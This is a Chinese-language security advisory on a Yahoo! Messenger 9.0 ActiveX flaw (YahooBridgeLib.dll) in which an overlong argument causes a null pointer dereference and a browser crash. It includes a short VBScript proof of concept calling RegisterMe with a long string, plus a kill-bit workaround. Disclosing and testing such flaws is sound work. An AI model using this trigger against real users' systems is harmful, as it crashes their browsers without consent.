受影响系统:
Yahoo! Messenger 9.0.0.2162
描述:
雅虎通是一款非常流行的即时通讯工具。
雅虎通所安装的YahooBridgeLib.dll Activex控件没有正确地验证用户所传送的超长参数。如果用户受骗访问了恶意网页并传送了超长参数,就可能触发空指针引用,导致浏览器崩溃。
<*来源:HACKATTACK IT SECURITY GmbH
链接:http://marc.info/?l=bugtraq&m=125804421323518&w=2
*>
测试方法:
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?XML version=’1.0′ standalone=’yes’ ?>
<package><job id=’DoneInVBS’ debug=’false’ error=’true’>
<object classid=’clsid:58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86′ id=’target’ />
<script language=’vbscript’>
arg1=String(11284, "A")
target.RegisterMe arg1
</script>
</job>
</package>
建议:
临时解决方法:
* 为clsid 58916BE6-BAFF-4F33-AEFE-B2AA03FE4C86设置kill-bit。
厂商补丁:
Yahoo!
——
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
0 条评论。